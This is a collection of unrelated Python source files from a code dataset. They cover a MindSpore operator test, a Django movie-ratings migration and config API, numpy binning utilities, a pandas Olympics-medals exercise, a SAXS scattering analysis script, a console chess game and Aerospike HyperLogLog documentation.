class IdentityIsNot(nn.Cell):
def __init__(self, x, y):
super(IdentityIsNot, self).__init__()
self.x = x
self.y = y
def construct(self):
in_v = self.x is not self.y
return in_v
def test_ms_syntax_operator_int_is_not_int():
net = IdentityIsNot(1, 2)
ret = net()
print(ret)
def test_ms_syntax_operator_int_is_not_none():
net = IdentityIsNot(1, None)
ret = net()
print(ret)
def test_ms_syntax_operator_int_is_not_true():
net = IdentityIsNot(1, True)
ret = net()
print(ret)
def test_ms_syntax_operator_bool_is_not_none():
net = IdentityIsNot(True, None)
ret = net()
print(ret)
def test_ms_syntax_operator_bool_is_not_false():
net = IdentityIsNot(True, False)
ret = net()
print(ret)
|
StarcoderdataPython
|
6677462
|
# Generated by Django 2.2 on 2019-04-17 13:45
from django.conf import settings
import django.contrib.auth.models
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0011_update_proxy_permissions'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
('user_id', models.AutoField(primary_key=True, serialize=False)),
('username', models.CharField(max_length=60, unique=True)),
('first_name', models.CharField(max_length=60)),
('last_name', models.CharField(blank=True, max_length=80, null=True)),
('email', models.CharField(max_length=120)),
],
options={
'verbose_name': 'user',
'verbose_name_plural': 'users',
'abstract': False,
},
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
migrations.CreateModel(
name='Group',
fields=[
('group_id', models.AutoField(primary_key=True, serialize=False)),
('group_name', models.CharField(max_length=60, unique=True)),
('created', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Movie',
fields=[
('movie_id', models.AutoField(primary_key=True, serialize=False)),
('title', models.CharField(max_length=100)),
('slug', models.SlugField(max_length=100)),
('rated', models.CharField(blank=True, choices=[('G', 'G'), ('PG', 'PG'), ('PG-13', 'PG-13'), ('R', 'R'), ('NC-17', 'NC-17')], default='PG-13', max_length=5, null=True)),
('released', models.DateField()),
('runtime_minutes', models.IntegerField()),
('genre', models.CharField(blank=True, max_length=20, null=True)),
('director', models.CharField(blank=True, max_length=80, null=True)),
('plot', models.TextField(blank=True, null=True)),
('poster_link', models.CharField(blank=True, max_length=250, null=True)),
('imdb_rating', models.FloatField(blank=True, null=True)),
('rt_rating', models.IntegerField(blank=True, null=True)),
('added_to_db', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Rating',
fields=[
('rating_id', models.AutoField(primary_key=True, serialize=False)),
('rating', models.FloatField()),
('comment', models.TextField(blank=True, null=True)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('movie', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ratings', to='ratings.Movie')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ratings', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Invitation',
fields=[
('invitation_id', models.AutoField(primary_key=True, serialize=False)),
('status', models.CharField(choices=[('sent', 'sent'), ('ignored', 'ignored')], default='sent', max_length=8)),
('sent', models.DateTimeField(auto_now_add=True)),
('group', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invitations_to_join', to='ratings.Group')),
('receiver', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='received_invitations', to=settings.AUTH_USER_MODEL)),
('sender', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='sent_invitations', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='GroupAdminMember',
fields=[
('group_admin_id', models.AutoField(primary_key=True, serialize=False)),
('group', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='ratings.Group')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddField(
model_name='user',
name='group',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='users', to='ratings.Group'),
),
migrations.AddField(
model_name='user',
name='groups',
field=models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups'),
),
migrations.AddField(
model_name='user',
name='user_permissions',
field=models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions'),
),
]
|
StarcoderdataPython
|
11312560
|
<gh_stars>1-10
from django.views.decorators.csrf import csrf_exempt
from rest_framework.generics import GenericAPIView
from rest_framework.response import Response
from rest_framework import status
from glbl.serializers import ConfigSerializer
from glbl.models import GlobalConfig
class ConfigView(GenericAPIView):
serializer_class = ConfigSerializer
@csrf_exempt
def get(self, request):
r = GlobalConfig().get_config()
if r:
return Response(r, status=status.HTTP_200_OK)
else:
return Response(
{"error": "configuration not found"}, status=status.HTTP_404_NOT_FOUND
)
@csrf_exempt
def post(self, request):
serializer = ConfigSerializer(data=request.data)
if serializer.is_valid():
if GlobalConfig.update_config(request.data):
return Response({"acknowledge": True}, status=status.HTTP_200_OK)
else:
return Response(
{"acknowledge": False, "error": "data not accepted"},
status=status.HTTP_200_OK,
)
|
StarcoderdataPython
|
179600
|
'''
TODO:
Median trimmer
'''
import numpy as np
def mad(arr,axis=None):
mid = np.median(arr,axis=axis)
return np.median(abs(arr-mid),axis=axis)
def bin_median(x,y,nbin):
binsize = (x.max()-x.min()) / (2*nbin)
bin_centers = np.linspace(x.min()+binsize,x.max()-binsize,nbin)
binned = np.empty(nbin)
error = np.empty(nbin)
for c in range(bin_centers.size):
mask = (x >= bin_centers[c]-binsize) & (x <= bin_centers[c]+binsize)
binned[c] = np.median(y[mask])
error[c] = np.std(y[mask])/np.sqrt(np.sum(mask))
return bin_centers,binned,error
def bin_mean(x,y,nbin):
binsize = (x.max()-x.min()) / (2*nbin)
bin_centers = np.linspace(x.min()+binsize,x.max()-binsize,nbin)
binned = np.empty(nbin)
error = np.empty(nbin)
for c in range(bin_centers.size):
mask = (x >= bin_centers[c]-binsize) & (x <= bin_centers[c]+binsize)
binned[c] = np.mean(y[mask])
error[c] = np.std(y[mask])/np.sqrt(np.sum(mask))
return bin_centers,binned,error
def bin_sum(data, nbin):
binsize = (data.max()-data.min()) / (2*nbin)
bin_centers = np.linspace(data.min()+binsize, data.max()-binsize, nbin)
binned = np.empty(nbin)
for c in range(bin_centers.size):
mask = (data >= bin_centers[c]-binsize) & (data <= bin_centers[c] + binsize)
binned[c] = np.sum(mask)
return bin_centers, binned
def csmooth(x, y, interval, eval=None):
if eval is None:
eval = x
n_points = np.zeros(eval.size)
sums = np.zeros(eval.size)
for i in range(y.size):
mask = (x > x[i]) & (x < x[i]+interval)
if np.sum(mask) > 4:
p = np.polyfit(x[mask], y[mask], 3)
eval_mask = (eval > x[i]) & (eval < x[i]+interval)
sums[eval_mask] += np.polyval(p, eval[eval_mask])
n_points[eval_mask] += 1
n_points[n_points == 0] = 1
return sums/n_points
def jackknife_variance(func,data,N=None,args=()):
estimate = func(data,*args)
if N is None:
N = data.size
omit_points = np.arange(N)
else:
omit_points = np.randint(0,data.size,N)
other_estimates = np.empty(N)
for i in range(N):
other_estimates[i] = func(np.delete(data,i),*args)
return (data.size-1)/N * np.sum((estimate-other_estimates)**2)
'''
under construction
'''
def median_filter(x,y,width=1):
lbound = np.zeros(y.size)
ubound = np.zeros(x.size)
cen = np.zeros(x.size)
for i in range(y.size):
lo = max(i-width,0)
hi = min(i+width,y.size)
tsec = x[lo:hi]
fsec = y[lo:hi]
fitmid = np.polyval(np.polyfit(tsec, fsec, 2), tsec)
normid = np.median(fsec)
mad = min(np.median(abs(fsec-fitmid)), np.median(abs(fsec-normid)))
cen[i] = normid
sigma = 1.4826*mad
ubound[i] = normid+3*sigma
lbound[i] = normid-3*sigma
from matplotlib import pyplot as plt
plt.plot(x,lbound,'g-')
plt.plot(x,ubound,'g-')
plt.plot(x,cen,'b-')
#plt.plot(x,y,'k.')
plt.ylim(y.min(),y.max())
plt.show()
exit()
mask = ((y < ubound) & (y > lbound))
return x[mask],y[mask]
'''
Median filter test code
'''
if __name__ == '__main__':
import os
from astropy.io import fits
os.chdir('/home/ben/research/kepler_llc/007500161')
files = [f for f in os.listdir('.') if f.endswith('_llc.fits')]
contents = fits.open(files[0])[1].data
x = contents['TIME']
y = contents['PDCSAP_FLUX']
mask = np.invert(np.isnan(x) | np.isnan(y))
x = x[mask]
y = y[mask]
median_filter(x,y,11)
|
StarcoderdataPython
|
6422674
|
# --------------
#Importing header files
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#Path of the file
data = pd.read_csv(path)
data.rename(columns = {'Total':"Total_Medals"}, inplace = True)
data.head()
#Code starts here
# --------------
#Code starts here
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
data['Better_Event'] = np.where(data['Total_Summer'] > data['Total_Winter'], 'Summer', 'Winter')
data['Better_Event'] = np.where(data['Total_Summer'] == data['Total_Winter'], 'Both', data['Better_Event'])
better_event = data['Better_Event'].value_counts().index.values[0]
print('Better_Event', better_event)
# --------------
#Code starts here
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
top_countries = data[['Country_Name', 'Total_Summer', 'Total_Winter','Total_Medals']]
top_countries= top_countries[:-1]
def top_ten(data, col):
country_list = []
country_list=list((data.nlargest(10,col)['Country_Name']))
return country_list
top_10_summer = top_ten(top_countries,'Total_Summer')
print('Top_10_Summer:\n',top_10_summer,'\n')
top_10_winter = top_ten(top_countries,'Total_Winter')
print('Top_10_Winter:\n', top_10_winter,'Total_Winter')
top_10 = top_ten(top_countries,'Total_Medals')
print('Total_Medals:\n',top_10,'\n')
common = list(set(top_10_summer) & set(top_10_winter) & set(top_10))
print('Common Countries :\n',common,'\n')
# --------------
#Code starts here
import matplotlib.pyplot as plt
summer_df=data[data['Country_Name'].isin(top_10_summer)]
winter_df=data[data['Country_Name'].isin(top_10_winter)]
top_df=data[data['Country_Name'].isin(top_10)]
plt.figure(figsize=(20,20))
plt.bar(top_df['Country_Name'], top_df['Total_Medals'])
plt.title('Top 10')
plt.xlabel('Country_Name')
plt.ylabel('Total Medals')
# --------------
#Code starts here
import matplotlib.pyplot as plt
summer_df['Golden_Ratio']=summer_df['Gold_Summer'] / summer_df['Total_Summer']
summer_max_ratio=max(summer_df['Golden_Ratio'])
summer_country_gold=summer_df.loc[summer_df['Golden_Ratio'].idxmax(),'Country_Name']
winter_df['Golden_Ratio']=winter_df['Gold_Winter'] / winter_df['Total_Winter']
winter_max_ratio=max(winter_df['Golden_Ratio'])
winter_country_gold=winter_df.loc[winter_df['Golden_Ratio'].idxmax(),'Country_Name']
top_df['Golden_Ratio'] = top_df['Gold_Total'] / top_df['Total_Medals']
top_max_ratio=max(top_df['Golden_Ratio'])
top_country_gold=top_df.loc[top_df['Golden_Ratio'].idxmax(), 'Country_Name']
# --------------
#Code starts here
data_1 = data[:-1]
data_1['Total_Points'] = data_1['Gold_Total'] * 3 + data_1['Silver_Total'] *2 + data_1['Bronze_Total']*1
most_points = max(data_1['Total_Points'])
best_country = data_1.loc[data_1['Total_Points'].idxmax(), 'Country_Name']
print('The maximum points acheived is ', most_points, 'by',best_country)
# --------------
#Code starts here
best = data[data['Country_Name'] == best_country]
best = best[['Gold_Total', 'Silver_Total', 'Bronze_Total']]
best.plot.bar(stacked = True)
plt.xlabel('United States')
plt.ylabel('Medals')
plt.xticks(rotation = 45)
|
StarcoderdataPython
|
3470850
|
<reponame>matiastang/matias-python<gh_stars>0
#!/usr/bin/python3
#coding=utf-8
def d_debug():
print(__name__)
def d_one():
print('d_one')
def d_two():
print('d_two')
|
StarcoderdataPython
|
3310210
|
<reponame>cristina-mt/biosoft_SAXS
"""
Test code for analysing SAXS data from ESRF
Created on Fri Nov 24 2017
Last modification on Mon Jan 8 2018
version: 0.0
@author: <NAME>
"""
# Import modules and functions
import numpy as np; import matplotlib.pyplot as plt
from scipy import interpolate
from saxs_open_v0 import OpenSAXS, ShowSAXS
from saxs_matrix_v0 import BuildMatrix
from saxs_basic_v0 import Integrate, Filtering, Fitting
# ========================================================================================
# Files to read
filedir = '[Replace with base file directory]'
file_poni = filedir + '[Replace with .poni file]'
file_mask = filedir + '[Replace with mask file]'
file_blank = filedir + '[Replace with .edf file containing the blank]'
file_sample = filedir + '[Replace with .edf file containing the sample]'
# Variables to choose how data is processed
norm_factor = True # Additional normalisation of background image.
# Set to True to extract the value from calibration information in poni file
# Set to False to ignore it (value equals 1)
# Set to a value between 0-1 to adjust manually the value
# Note: It's not clear what is this normalisation, to be checked with Daniel
res_vect = 1 # Resolution of the radial integration, in pixels. Recommended value: 1
a_der = 5. # Width of the gaussian filter used to subtract scattering trendline in radial profile
qmin_pl = 0.05 # Lower limit to fit log(I) = beta*log(q)
qmax_pl = 0.15 # Upper limit
peak_pos0 = 0.3 # Expected position of scattering peak, used for gauss fit
qmin_fg = 0.22 # Lower limit to fit the scattered peak
qmax_fg = 0.38 # Upper limit
# Display 'checkpoints'
checkpoint_0 = 0 # Raw data check
checkpoint_1 = 0 # Background subtraction in 2D image
checkpoint_2 = 0 # Radial profile
# ========================================================================================
# ========================================================================================
# Read files and store content in variables
cal_info = OpenSAXS.read_poni(file_poni)
if file_mask[-3:] == 'edf' : mask = OpenSAXS.read_mask_edf(file_mask)
elif file_mask[-3:] == 'txt' : mask = OpenSAXS.read_mask_txt(file_mask)
img_blank, header_blank = OpenSAXS.read_edf(file_blank)
img_sample, header_sample = OpenSAXS.read_edf(file_sample)
# --------------------------------------------
# CHECKPOINT 0 : Correct reading of raw data.
# Display the input data
if checkpoint_0 == 1:
ShowSAXS.mask(mask) # Shows mask (binary)
ShowSAXS.raw_img(img_blank, vmin = 3, vmax = 8) # Shows blank image
plt.title('...'+file_blank[-30:])
ShowSAXS.raw_img(img_sample, vmin = 3, vmax = 8) # Shows sample image
plt.title('...'+file_sample[-30:])
ShowSAXS.img_wmask(img_sample, mask, vmin = 3, vmax = 8) # Shows overlay mask on sample image
plt.show()
# ========================================================================================
# Variables used for normalisation, obtained from calibration info in poni file
photo_sample = np.float(header_sample.get('Photo'))
monitor_sample = np.float(header_sample.get('Monitor'))
photo_blank = np.float(header_blank.get('Photo'))
monitor_blank = np.float(header_blank.get('Monitor'))
# Choose the given normalisation factor for background (See notes in line ~24 above
if norm_factor == True: abs_corr = (photo_sample/monitor_sample)/(photo_blank/monitor_blank)
elif norm_factor == False: abs_corr = 1.
else: abs_corr = 1.*norm_factor
# Normalise each saxs data and subtract background from sample
img_corr = (img_sample/photo_sample) - (img_blank/photo_blank)*abs_corr
img_corr[mask==1] = -1
# ------------------------------------------------------------
# CHECKPOINT 1: Data normalisation and background subtraction
if checkpoint_1 == 1:
ShowSAXS.raw_img(img_corr, vmin = -9, vmax = -3)
plt.title('Corrected Image sample')
plt.show()
# ========================================================================================
# Build coordinate matrices used for analysis
center, mat_dist = BuildMatrix.distance(img_sample.shape, cal_info) # Distance matrix (in m)
mat_qvalues = BuildMatrix.qvalues(mat_dist, cal_info) # matrix of q values
mat_qvalues[mask == 1] = -1
# Radial integration, the resolution of the qvector [res_vect] is given in pixels,
# needs to be converted o q value
qdiff = np.abs(mat_qvalues[int(center[0]):,1:] - mat_qvalues[int(center[0]):,:-1])
qmin = np.mean(qdiff[qdiff>0])
qres = res_vect*qmin
# Plots I(q) in loglog scale
radial_profile, q_vector = Integrate.radial(img_corr, mat_qvalues, qres)
radial_profile = np.array(radial_profile)
q_vector = np.array(q_vector)
# ------------------------------------------------------------
# CHECKPOINT 2: Radial profile
if checkpoint_2 == 1:
plt.figure()
plt.loglog(q_vector, radial_profile, c = 'k')
plt.xlabel('q (1/m)')
plt.ylabel ('I(q) (a.u.)')
plt.show()
# ========================================================================================
# Fit line to log(I) = beta*log(q) to extract power-law, in the range qmin_pl, qmax_pl
beta = Fitting.q_powerlaw_lin([qmin_pl, qmax_pl], q_vector, radial_profile)
# Mirror the radial profile, and then apply first derivative of a gaussian as a kernel
# If the kernel is applied with a width large enough, it should subtract the trendline
# Less subjective way of subtracting the 'regular scattering' profile from the scattering peak
# All the interpolated mirrored signals, are in logscale
offset_nan, mirror_qv, mirror_rp = Filtering.mirror_logsignal_1D(q_vector, radial_profile)
interp_mq = np.linspace(mirror_qv[0], mirror_qv[-1], np.power(int(len(mirror_qv)/2),2)) # interpolation, power of 2 for filtering
interp_mr = mirror_rp(interp_mq)
# Choose filter width based on fraction of the one order of magnitude
number_decades = len(np.unique([int(mq) for mq in interp_mq]))
a_scale_der = int(len(interp_mr)/number_decades/a_der)
# Derivate and extract local trendline from radial profile
der_rp = Filtering.gauss_der_1D_fixed(interp_mr, float(a_scale_der))
trendline_rp = -der_rp*(interp_mq)-interp_mq
corr_radial_profile = interp_mr-trendline_rp
# Go back to measured q range, still in logspace
inv_interp_corr_rp = interpolate.interp1d(
interp_mq, corr_radial_profile, kind = 'slinear')
inv_corr_radial_profile = inv_interp_corr_rp(np.log10(q_vector[offset_nan:]))
# Fit scattering peak in logspace (Note: Is it better?)
peak_gfit, error_gfit, rs_gfit = Fitting.qpeak_loggauss(
peak_pos0, [qmin_fg, qmax_fg],
q_vector[offset_nan:],
inv_corr_radial_profile)
peak_pos = np.power(10, peak_gfit[2])
peak_width = np.power(10, 2*np.sqrt(2*np.log(2))*peak_gfit[3])
width_error = 2*np.sqrt(2*np.log(2))*error_gfit[3]
lq = 2*np.pi/peak_pos # Characteristic length of q value
# ========================================================================================
# ========================================================================================
print('Peak position: ' + str(peak_pos) +\
'\nPeak position error: ' + str(error_gfit[2]) +\
'\nPeak width: ' + str(peak_width) +\
'\nPeak width error: ' +str(width_error) +\
'\nR-square Fit: ' +str(rs_gfit) +\
'\nCharacteristic length: ' +str(lq)
)
plt.figure()
plt.loglog(q_vector, radial_profile, c = 'k', label = 'Data')
plt.loglog(q_vector[offset_nan:],
np.power(10, inv_corr_radial_profile),
c = [0.7,0.7,0.7],
label = 'Trendline correction')
plt.loglog([qmin_pl,qmax_pl],
np.min(radial_profile[~np.isnan(radial_profile)])*([qmin_pl, qmax_pl]**beta),
c = 'c',
label = 'Power-law fit')
plt.text(qmax_pl,
2*np.min(radial_profile[~np.isnan(radial_profile)])*qmax_pl**beta,
r'$\beta$ = ' +str(-beta)[:4])
plt.loglog(q_vector[offset_nan:],
np.power(10,Fitting.gauss_fit(
np.log10(q_vector[offset_nan:]),
peak_gfit[0], peak_gfit[1], peak_gfit[2], peak_gfit[3])),
'-', c = 'cyan', lw = 1,
label = 'Gauss Fit Peak')
plt.loglog([peak_pos,peak_pos], [0,1], '--', lw = 1, c = 'm')
plt.text(peak_pos*1.5, np.mean(radial_profile[~np.isnan(radial_profile)]),
'q = ' + str(peak_pos)[:5] +r'nm$^{-1}$'+'\n l = ' + str(lq)[:5] + 'nm')
plt.xlim([3e-2, 5])
plt.ylim([0.9*np.min(radial_profile[~np.isnan(radial_profile)]),
1.1*np.max(radial_profile[~np.isnan(radial_profile)])])
plt.xlabel('q (1/m)')
plt.ylabel ('I(q) (a.u.)')
plt.title('...'+file_sample[-40:-4])
plt.legend()
plt.show()
|
StarcoderdataPython
|
5105060
|
<filename>minimumViableProductBasicGame.py
import itertools
WHITE = "white"
BLACK = "black"
class Game:
#ive decided since the number of pieces is capped but the type of pieces is not (pawn transformations), I've already coded much of the modularity to support just using a dictionary of pieces
def __init__(self):
self.playersturn = BLACK
self.message = "this is where prompts will go"
self.gameboard = {}
self.placePieces()
print("chess program. enter moves in algebraic notation separated by space")
self.main()
def placePieces(self):
for i in range(0,8):
self.gameboard[(i,1)] = Pawn(WHITE,uniDict[WHITE][Pawn],1)
self.gameboard[(i,6)] = Pawn(BLACK,uniDict[BLACK][Pawn],-1)
placers = [Rook,Knight,Bishop,Queen,King,Bishop,Knight,Rook]
for i in range(0,8):
self.gameboard[(i,0)] = placers[i](WHITE,uniDict[WHITE][placers[i]])
self.gameboard[((7-i),7)] = placers[i](BLACK,uniDict[BLACK][placers[i]])
placers.reverse()
def main(self):
while True:
self.printBoard()
print(self.message)
self.message = ""
startpos,endpos = self.parseInput()
try:
target = self.gameboard[startpos]
except:
self.message = "could not find piece; index probably out of range"
target = None
if target:
print("found "+str(target))
if target.Color != self.playersturn:
self.message = "you aren't allowed to move that piece this turn"
continue
if target.isValid(startpos,endpos,target.Color,self.gameboard):
self.message = "that is a valid move"
self.gameboard[endpos] = self.gameboard[startpos]
del self.gameboard[startpos]
self.isCheck()
if self.playersturn == BLACK:
self.playersturn = WHITE
else : self.playersturn = BLACK
else :
self.message = "invalid move" + str(target.availableMoves(startpos[0],startpos[1],self.gameboard))
print(target.availableMoves(startpos[0],startpos[1],self.gameboard))
else : self.message = "there is no piece in that space"
def isCheck(self):
#ascertain where the kings are, check all pieces of opposing color against those kings, then if either get hit, check if its checkmate
king = King
kingDict = {}
pieceDict = {BLACK : [], WHITE : []}
for position,piece in self.gameboard.items():
if type(piece) == King:
kingDict[piece.Color] = position
print(piece)
pieceDict[piece.Color].append((piece,position))
#white
if self.canSeeKing(kingDict[WHITE],pieceDict[BLACK]):
self.message = "White player is in check"
if self.canSeeKing(kingDict[BLACK],pieceDict[WHITE]):
self.message = "Black player is in check"
def canSeeKing(self,kingpos,piecelist):
#checks if any pieces in piece list (which is an array of (piece,position) tuples) can see the king in kingpos
for piece,position in piecelist:
if piece.isValid(position,kingpos,piece.Color,self.gameboard):
return True
def parseInput(self):
try:
a,b = input().split()
a = ((ord(a[0])-97), int(a[1])-1)
b = (ord(b[0])-97, int(b[1])-1)
print(a,b)
return (a,b)
except:
print("error decoding input. please try again")
return((-1,-1),(-1,-1))
"""def validateInput(self, *kargs):
for arg in kargs:
if type(arg[0]) is not type(1) or type(arg[1]) is not type(1):
return False
return True"""
def printBoard(self):
print(" 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |")
for i in range(0,8):
print("-"*32)
print(chr(i+97),end="|")
for j in range(0,8):
item = self.gameboard.get((i,j)," ")
print(str(item)+' |', end = " ")
print()
print("-"*32)
"""game class. contains the following members and methods:
two arrays of pieces for each player
8x8 piece array with references to these pieces
a parse function, which turns the input from the user into a list of two tuples denoting start and end points
a checkmateExists function which checks if either players are in checkmate
a checkExists function which checks if either players are in check (woah, I just got that nonsequitur)
a main loop, which takes input, runs it through the parser, asks the piece if the move is valid, and moves the piece if it is. if the move conflicts with another piece, that piece is removed. ischeck(mate) is run, and if there is a checkmate, the game prints a message as to who wins
"""
class Piece:
def __init__(self,color,name):
self.name = name
self.position = None
self.Color = color
def isValid(self,startpos,endpos,Color,gameboard):
if endpos in self.availableMoves(startpos[0],startpos[1],gameboard, Color = Color):
return True
return False
def __repr__(self):
return self.name
def __str__(self):
return self.name
def availableMoves(self,x,y,gameboard):
print("ERROR: no movement for base class")
def AdNauseum(self,x,y,gameboard, Color, intervals):
"""repeats the given interval until another piece is run into.
if that piece is not of the same color, that square is added and
then the list is returned"""
answers = []
for xint,yint in intervals:
xtemp,ytemp = x+xint,y+yint
while self.isInBounds(xtemp,ytemp):
#print(str((xtemp,ytemp))+"is in bounds")
target = gameboard.get((xtemp,ytemp),None)
if target is None: answers.append((xtemp,ytemp))
elif target.Color != Color:
answers.append((xtemp,ytemp))
break
else:
break
xtemp,ytemp = xtemp + xint,ytemp + yint
return answers
def isInBounds(self,x,y):
"checks if a position is on the board"
if x >= 0 and x < 8 and y >= 0 and y < 8:
return True
return False
def noConflict(self,gameboard,initialColor,x,y):
"checks if a single position poses no conflict to the rules of chess"
if self.isInBounds(x,y) and (((x,y) not in gameboard) or gameboard[(x,y)].Color != initialColor) : return True
return False
chessCardinals = [(1,0),(0,1),(-1,0),(0,-1)]
chessDiagonals = [(1,1),(-1,1),(1,-1),(-1,-1)]
def knightList(x,y,int1,int2):
"""sepcifically for the rook, permutes the values needed around a position for noConflict tests"""
return [(x+int1,y+int2),(x-int1,y+int2),(x+int1,y-int2),(x-int1,y-int2),(x+int2,y+int1),(x-int2,y+int1),(x+int2,y-int1),(x-int2,y-int1)]
def kingList(x,y):
return [(x+1,y),(x+1,y+1),(x+1,y-1),(x,y+1),(x,y-1),(x-1,y),(x-1,y+1),(x-1,y-1)]
class Knight(Piece):
def availableMoves(self,x,y,gameboard, Color = None):
if Color is None : Color = self.Color
return [(xx,yy) for xx,yy in knightList(x,y,2,1) if self.noConflict(gameboard, Color, xx, yy)]
class Rook(Piece):
def availableMoves(self,x,y,gameboard ,Color = None):
if Color is None : Color = self.Color
return self.AdNauseum(x, y, gameboard, Color, chessCardinals)
class Bishop(Piece):
def availableMoves(self,x,y,gameboard, Color = None):
if Color is None : Color = self.Color
return self.AdNauseum(x, y, gameboard, Color, chessDiagonals)
class Queen(Piece):
def availableMoves(self,x,y,gameboard, Color = None):
if Color is None : Color = self.Color
return self.AdNauseum(x, y, gameboard, Color, chessCardinals+chessDiagonals)
class King(Piece):
def availableMoves(self,x,y,gameboard, Color = None):
if Color is None : Color = self.Color
return [(xx,yy) for xx,yy in kingList(x,y) if self.noConflict(gameboard, Color, xx, yy)]
class Pawn(Piece):
def __init__(self,color,name,direction):
self.name = name
self.Color = color
#of course, the smallest piece is the hardest to code. direction should be either 1 or -1, should be -1 if the pawn is traveling "backwards"
self.direction = direction
def availableMoves(self,x,y,gameboard, Color = None):
if Color is None : Color = self.Color
answers = []
if (x+1,y+self.direction) in gameboard and self.noConflict(gameboard, Color, x+1, y+self.direction) : answers.append((x+1,y+self.direction))
if (x-1,y+self.direction) in gameboard and self.noConflict(gameboard, Color, x-1, y+self.direction) : answers.append((x-1,y+self.direction))
if (x,y+self.direction) not in gameboard and Color == self.Color : answers.append((x,y+self.direction))# the condition after the and is to make sure the non-capturing movement (the only fucking one in the game) is not used in the calculation of checkmate
return answers
uniDict = {WHITE : {Pawn : "♙", Rook : "♖", Knight : "♘", Bishop : "♗", King : "♔", Queen : "♕" }, BLACK : {Pawn : "♟", Rook : "♜", Knight : "♞", Bishop : "♝", King : "♚", Queen : "♛" }}
Game()
|
StarcoderdataPython
|
3249420
|
<reponame>EpicEric/base_stations_django
from collections import Counter
from django.test import TestCase
from django.contrib.gis.geos import Point
from model_mommy import mommy
from base_station.models import IdentifiedBaseStation
class IdentifiedBaseStationTestCase(TestCase):
def test_one_bs_inside_bounds(self):
bs = mommy.make(IdentifiedBaseStation, point=Point(-46.5, -23.5))
bs_within_box = IdentifiedBaseStation.get_base_stations_inside_bounds(
-46, -23, -47, -24)
self.assertEqual(bs_within_box.first(), bs)
def test_some_bs_inside_and_some_outside_bounds(self):
bs_inside = [
mommy.make(IdentifiedBaseStation, point=Point(-46.5, -23.5)),
mommy.make(IdentifiedBaseStation, point=Point(-46.2, -24.0)),
mommy.make(IdentifiedBaseStation, point=Point(-46.0, -23.9))]
bs_outside = [
mommy.make(IdentifiedBaseStation, point=Point(-47.5, -23.5)),
mommy.make(IdentifiedBaseStation, point=Point(46.2, -24.0)),
mommy.make(IdentifiedBaseStation, point=Point(-46.3, -24.1))]
bs_within_box = IdentifiedBaseStation.get_base_stations_inside_bounds(
-46, -23, -47, -24)
self.assertEqual(Counter(bs_within_box), Counter(bs_inside))
def test_get_covered_area(self):
#TODO
pass
|
StarcoderdataPython
|
4892531
|
<filename>aerospike_helpers/operations/hll_operations.py
'''
Helper functions to create HyperLogLog operation dictionary arguments for
the :mod:`aerospike.Client.operate` and :mod:`aerospike.Client.operate_ordered` methods of the aerospike client.
HyperLogLog bins and operations allow for your application to form fast, reasonable approximations
of members in the union or intersection between multiple HyperLogLog bins.
HyperLogLog’s estimates are a balance between complete accuracy and efficient savings
in space and speed in dealing with extremely large datasets.
.. note:: HyperLogLog operations require server version >= 4.9.0
.. seealso:: `HyperLogLog (Data Type) more info. <https://www.aerospike.com/docs/guide/hyperloglog.html>`_.
Example::
from __future__ import print_function
import sys
import aerospike
from aerospike import exception as ex
from aerospike_helpers.operations import hll_operations as hll_ops
from aerospike_helpers.operations import operations
TEST_NS = "test"
TEST_SET = "demo"
NUM_INDEX_BITS = 12
NUM_MH_BITS = 24
# Configure the client.
config = {"hosts": [("127.0.0.1", 3000)]}
# Create a client and connect it to the cluster.
try:
client = aerospike.client(config).connect()
except ex.ClientError as e:
print("Error: {0} [{1}]".format(e.msg, e.code))
sys.exit(1)
# Add HLL bins.
customers = ["Amy", "Farnsworth", "Scruffy"]
customer_record_keys = [
(TEST_NS, TEST_SET, "Amy"),
(TEST_NS, TEST_SET, "Farnsworth"),
(TEST_NS, TEST_SET, "Scruffy"),
]
items_viewed = [
("item%s" % str(i) for i in range(0, 500)),
("item%s" % str(i) for i in range(0, 750)),
("item%s" % str(i) for i in range(250, 1000)),
]
for customer, key, items in zip(customers, customer_record_keys, items_viewed):
ops = [
operations.write("name", customer),
hll_ops.hll_add("viewed", list(items), NUM_INDEX_BITS, NUM_MH_BITS),
]
try:
client.operate(key, ops)
except ex.ClientError as e:
print("Error: {0} [{1}]".format(e.msg, e.code))
sys.exit(1)
# Find out how many items viewed Amy, Farnsworth, and Scruffy have in common.
Farnsworth_viewed = client.get(customer_record_keys[1])[2]["viewed"]
Scruffy_viewed = client.get(customer_record_keys[2])[2]["viewed"]
viewed = [Farnsworth_viewed, Scruffy_viewed]
